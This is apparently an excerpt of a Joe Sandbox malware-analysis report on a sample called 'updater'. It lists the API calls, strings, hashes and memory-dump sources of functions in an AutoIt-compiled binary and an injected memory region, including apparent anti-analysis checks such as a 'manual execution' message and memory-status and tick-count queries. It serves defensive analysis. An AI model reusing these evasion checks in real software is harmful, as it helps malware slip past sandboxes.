Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <w=$\t=$s=
API String ID: 1986988660-4038161539
Opcode ID: ff452102beee90fa553d8531056542efae60339a1cd2f82cfd548d3466334d38
Instruction ID: 7598d73e3d3d036575c74a90a085ae258e27f328f3e08d9d03ca07e1d1d0b273
Opcode Fuzzy Hash: ff452102beee90fa553d8531056542efae60339a1cd2f82cfd548d3466334d38
Instruction Fuzzy Hash: 00819AB890A2508EC387DF2ABD456657FFDEB59304B50856BE419C7371F77044058F51

Function 016EC5C1 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,016EC861,00000000), ref: 016EC622
MessageBoxA.USER32(00000000,no data,016EC861,00000000), ref: 016EC69A
GetTickCount.KERNEL32 ref: 016EC732

Strings

Executing manually will not work, xrefs: 016EC61B
CbirNKNZ, xrefs: 016EC5F2
no data, xrefs: 016EC693

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Message$CountTick
String ID: CbirNKNZ$Executing manually will not work$no data
API String ID: 1431039135-1077164830
Opcode ID: 04aa1e1a24969fc5481a50d459be98abadbba515787a8450745896ba19c0ee63
Instruction ID: d978ed3ebc0bd8088d91a19c796d514cc5274aa8164f3d2adeef21cfcaaa9f90
Opcode Fuzzy Hash: 04aa1e1a24969fc5481a50d459be98abadbba515787a8450745896ba19c0ee63
Instruction Fuzzy Hash: B7611934A06205DFCB20EF94DC98AAE77F6FB68700F515369E805AB358DB31AC11CB59

Function 003250DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00325109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0032512A
ShowWindow.USER32(00000000), ref: 0032513E
ShowWindow.USER32(00000000), ref: 00325147

Strings

edit, xrefs: 00325124
AutoIt v3, xrefs: 00325101, 00325106, 00325107

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: cb6ee8601fa3fd4e9e59f1f87483fbc94cdb258e0c4eb0dcb6162239c556e145
Instruction ID: 8368052c715893ea8b36be4457d74b974f980529ed51c1eecd32293684867413
Opcode Fuzzy Hash: cb6ee8601fa3fd4e9e59f1f87483fbc94cdb258e0c4eb0dcb6162239c556e145
Instruction Fuzzy Hash: 3BF0B7715462A47AEA221727BC48E672F7DE7C7F50F00451BB900A21B0E6711851DAB0

Function 016E5365 Relevance: 9.1, APIs: 6, Instructions: 106filewindowCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,016E97B5,00000001,00000000,00000000,00000000), ref: 016E5381
MessageBoxA.USER32(00000000,016E549D,016E5499,00000000), ref: 016E539B
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,016E97B5,00000001,00000000), ref: 016E53A3
ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 016E53C5
MessageBoxA.USER32(00000000,016E54A1,016E5499,00000000), ref: 016E53DC
CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 016E5486

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: File$Message$CloseCreateHandleReadSize
String ID:
API String ID: 2324011479-0
Opcode ID: e5c1c0215d361a4d518a3aa174c6260092ead4a415a2a10b58f56caab4acb0db
Instruction ID: 6ef5ce3530ce32aaa1c51c32ab28b1997871c1aca2502bf4dc3c360d8e43172f
Opcode Fuzzy Hash: e5c1c0215d361a4d518a3aa174c6260092ead4a415a2a10b58f56caab4acb0db
Instruction Fuzzy Hash: 10313974745302AFD300EF19CC85F1AB3E5EF98B11F10892CB99A9B381D670E8058B55

Function 00379B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00324A8C: _fseek.LIBCMT ref: 00324AA4

Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DE1
Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DF4

_free.LIBCMT ref: 00379C5F
_free.LIBCMT ref: 00379C66
_free.LIBCMT ref: 00379CD1

Part of subcall function 00332F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00339C54,00000000,00338D5D,003359C3), ref: 00332F99
Part of subcall function 00332F85: GetLastError.KERNEL32(00000000,?,00339C54,00000000,00338D5D,003359C3), ref: 00332FAB

_free.LIBCMT ref: 00379CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00379B8F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: b7b95b61f568d2851be1415840c2ef3ffb6618b6d431b880111255f860124f6c
Instruction ID: 9cef9663f17cea6a2f3a221e31511b255b7a3d65e877d0821db0f18495f2a10a
Opcode Fuzzy Hash: b7b95b61f568d2851be1415840c2ef3ffb6618b6d431b880111255f860124f6c
Instruction Fuzzy Hash: 17514CB1904229AFDF25DF64DC81BAEBBB9FF48304F00419EF649A7241DB755A808F58

Function 016E84C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,016E88B8), ref: 016E84D6
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 016E84E3
GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,016E88B8), ref: 016E84E9

Strings

kernel32.dll, xrefs: 016E84D1
GlobalMemoryStatusEx, xrefs: 016E84DD

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressGlobalHandleMemoryModuleProcStatus
String ID: GlobalMemoryStatusEx$kernel32.dll
API String ID: 2450578220-2840702992
Opcode ID: 596ba0584331f2bfac6e2a161f7574d524d31f1990fb576e45aceebb112df706
Instruction ID: 6a60986c0dc0fe04d9ee9a4f105c10500e16c90137398fd541f7db62eeb809af
Opcode Fuzzy Hash: 596ba0584331f2bfac6e2a161f7574d524d31f1990fb576e45aceebb112df706
Instruction Fuzzy Hash: D5F09074643200CFC712DFE8EC84A4537E5FB1A255B042798E411CF31AEA309850CB54

Function 016E84CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,016E88B8), ref: 016E84D6
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 016E84E3
GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,016E88B8), ref: 016E84E9

Strings

kernel32.dll, xrefs: 016E84D1
GlobalMemoryStatusEx, xrefs: 016E84DD

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: AddressGlobalHandleMemoryModuleProcStatus
String ID: GlobalMemoryStatusEx$kernel32.dll
API String ID: 2450578220-2840702992
Opcode ID: 3a9c3ea69d4fd0bf90428a8b91e3423db789ad9fa220dc8565bddf1e77b2e5ca
Instruction ID: 744ee6fb2f505320cff66642a4eb240f977d6e60e375c24e27f2e1bcd6dadcc8
Opcode Fuzzy Hash: 3a9c3ea69d4fd0bf90428a8b91e3423db789ad9fa220dc8565bddf1e77b2e5ca
Instruction Fuzzy Hash: 69C09292B932317A694132F51CC5CBB02DECE694AA311226EB903E3502ED850E0002FA

Function 0033563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033569B
_memcpy_s.LIBCMT ref: 0033570D
__read_nolock.LIBCMT ref: 0033576B
__filbuf.LIBCMT ref: 0033578E
_memset.LIBCMT ref: 003357D2

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 1c1c9768d1110f94f3a81ac88212756d4e3feedf455e3cf041dcd6f3c367d954
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: DA51C370A00B05DBDB2A8FB9C8C566EB7B5AF40320F258729F8359A6D0D7709D509B40

Function 003152B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003152E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0031534A
TranslateMessage.USER32(?), ref: 00315356
DispatchMessageW.USER32(?), ref: 00315360

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: bc6753c3e762c533a38e62a750e5db8d7fa9581577ce862a82763403cf503b22
Instruction ID: 1eec856fbe3370be58cdf0ff68f1dba774209a283dbcc07a9a388497fee5fe5d
Opcode Fuzzy Hash: bc6753c3e762c533a38e62a750e5db8d7fa9581577ce862a82763403cf503b22
Instruction Fuzzy Hash: D1310731508706DBEB3B8B64EC44FF937EC9B89344F15085AE4628B5E0E7B1A8C9E711

Function 00311284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00311275,SwapMouseButtons,00000004,?), ref: 003112A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00311275,SwapMouseButtons,00000004,?), ref: 003112C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00311275,SwapMouseButtons,00000004,?), ref: 003112EB

Strings

Control Panel\Mouse, xrefs: 003112A6

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 70775c75da8c2e395022c256b5215bf906113e858a964f849fc838a0938a0c00
Instruction ID: 9c88e4844c3d09ecc62444d195fca0d0bd40ae4e1548338b4553f1e1ab809765
Opcode Fuzzy Hash: 70775c75da8c2e395022c256b5215bf906113e858a964f849fc838a0938a0c00
Instruction Fuzzy Hash: 75114875515208BFDB268FA4DC84AEFBBACEF09740F004959E945D7110E2719E8197A0

Function 00330FE6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033593C: __FF_MSGBANNER.LIBCMT ref: 00335953
Part of subcall function 0033593C: __NMSG_WRITE.LIBCMT ref: 0033595A
Part of subcall function 0033593C: RtlAllocateHeap.NTDLL(01530000,00000000,00000001,?,00000004,?,?,00331003,?), ref: 0033597F

std::exception::exception.LIBCMT ref: 0033101C
__CxxThrowException@8.LIBCMT ref: 00331031

Part of subcall function 003387CB: RaiseException.KERNEL32(?,?,?,003CCAF8,?,?,?,?,?,00331036,?,003CCAF8,?,00000001), ref: 00338820

Strings

h=:, xrefs: 00331011
`=:, xrefs: 00331029

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: `=:$h=:
API String ID: 3902256705-2162103346
Opcode ID: a945de42831fa90c47da5076e9161d953163401069e44ee0989fedc692c1fe24
Instruction ID: 11bfe75be327bece269929b01eab4d041092bd9fa831b9eeec0b41cd83646c0c
Opcode Fuzzy Hash: a945de42831fa90c47da5076e9161d953163401069e44ee0989fedc692c1fe24
Instruction Fuzzy Hash: 2DF0C87554431DA6CB27BB98DC95ADEB7ACDF01310F100455F914AA191DFB18B80C2E0

Function 00325B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00325B58

Part of subcall function 003256F8: _memset.LIBCMT ref: 00325787
Part of subcall function 003256F8: _wcscpy.LIBCMT ref: 003257DB
Part of subcall function 003256F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003257EB

KillTimer.USER32(?,00000001,?,?), ref: 00325BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00325BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00360D7C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 66b6ee08db6a406ab2aa63a41e6ddc219fc7a47a105fcb67232efdfc9cbb23df
Instruction ID: 1a47c33f06dc9884e18c9e6e411c47e848dbe6c57010278c28bff2735222487c
Opcode Fuzzy Hash: 66b6ee08db6a406ab2aa63a41e6ddc219fc7a47a105fcb67232efdfc9cbb23df
Instruction Fuzzy Hash: 26213870904794AFE7778B64DC96FEBBFECAF02308F00458DE69A56281C3742A84CB41

Function 016E900D Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,016E909C), ref: 016E904D
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,016E909C), ref: 016E905C
ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,016E909C), ref: 016E907B
CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 016E9081

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 4e38d3ed89fde6fd1a84e5b0a1eec1dc4ebd130b6fb5bd19e627e83ccbc19dac
Instruction ID: 3afa9b16d51842c114933eba218aa97143d2312a216e8c5f479a2128f09b6ac6
Opcode Fuzzy Hash: 4e38d3ed89fde6fd1a84e5b0a1eec1dc4ebd130b6fb5bd19e627e83ccbc19dac
Instruction Fuzzy Hash: 90112D70E00305BEE720EF79CC82F5ABBFDEB09710F610569B515E7690EA716A008B54

Function 0032278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 003249C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,003227AF,?,00000001), ref: 003249F4

_free.LIBCMT ref: 0035FB04
_free.LIBCMT ref: 0035FB4B

Part of subcall function 003229BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00322ADF

Strings

Bad directive syntax error, xrefs: 0035FB33

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 2064b0c8d57ddb673a27d30dca176160e6d700587e802cf18d58a6e85a24a99c
Instruction ID: 9cd4effb2cab2cb5b3ae7d9a2fd46ea608f46d8ac2774b18d0efdfa60d139d2c
Opcode Fuzzy Hash: 2064b0c8d57ddb673a27d30dca176160e6d700587e802cf18d58a6e85a24a99c
Instruction Fuzzy Hash: C3917171910229AFCF16EFA4DC91DEEB7B8FF05311F14452AF816AB2A1DB349909CB50

Function 003248B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003248FA

Strings

AU3! ?:, xrefs: 003248F4
EA06, xrefs: 003608A1

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?:$EA06
API String ID: 4104443479-874976573
Opcode ID: d66fa3c8a046783ee8e6dc76acb62446487b02f902b78af45a77550ed6007c41
Instruction ID: 742671d2d4f0f96bba9822b355f8fbe2626ef99d1d060d6bc46b2e46c2c5fd7b
Opcode Fuzzy Hash: d66fa3c8a046783ee8e6dc76acb62446487b02f902b78af45a77550ed6007c41
Instruction Fuzzy Hash: 5C415C32A041785BDF27DB64A8527BF7FA98B55300F698075E882EF287D7218DC487E1

Function 00379CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00324AB2: __fread_nolock.LIBCMT ref: 00324AD0

_wcscmp.LIBCMT ref: 00379DE1
_wcscmp.LIBCMT ref: 00379DF4

Strings

FILE, xrefs: 00379D2D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: e98a8d88937050790d881b85e4c7405f9d4c585d427f83e1466b830dca34098b
Instruction ID: ffdf0a5e7f71b6afcfe8538b709eae9181e11ede68ecb8786d00f819d1c10551
Opcode Fuzzy Hash: e98a8d88937050790d881b85e4c7405f9d4c585d427f83e1466b830dca34098b
Instruction Fuzzy Hash: 37412971A00219BADF22DAA4DC45FEFB7FDDF45710F00416AF904EF180D675A9048764

Function 003231BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0036032B
GetOpenFileNameW.COMDLG32(?), ref: 00360375

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

Part of subcall function 003309C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003309E4

Strings

X, xrefs: 00360343

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 591f5cf3ad559bc8548e9fac22770ae0be08ca3c5ff03b59708acd3bfbf50b99
Instruction ID: 90fe0eeb909b32b848a1296305ef8e444a89e29f9bbe7b1b7819f6eee64dbad5
Opcode Fuzzy Hash: 591f5cf3ad559bc8548e9fac22770ae0be08ca3c5ff03b59708acd3bfbf50b99
Instruction Fuzzy Hash: 53219375A042989BCB46DF94DC45BEE7BFC9F49304F10405AE404EB241DBB55A88DFA1

Function 016EC5B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,016EC861,00000000), ref: 016EC622

Strings

Executing manually will not work, xrefs: 016EC61B
CbirNKNZ, xrefs: 016EC5F2

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Message
String ID: CbirNKNZ$Executing manually will not work
API String ID: 2030045667-1105352921
Opcode ID: a86a20c45bce83b693098912d044eefd9e4781e6111b17c437029464bb19aa69
Instruction ID: 3db74c24542c56797634f1adac58c8a1556014cb87fec715baed67d58d02331b
Opcode Fuzzy Hash: a86a20c45bce83b693098912d044eefd9e4781e6111b17c437029464bb19aa69
Instruction Fuzzy Hash: BC114830A0A30ADFE711EBA0CC15B5B3BEAEB58B10F51427EE4005B684DA74AC15C619

Function 0038D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

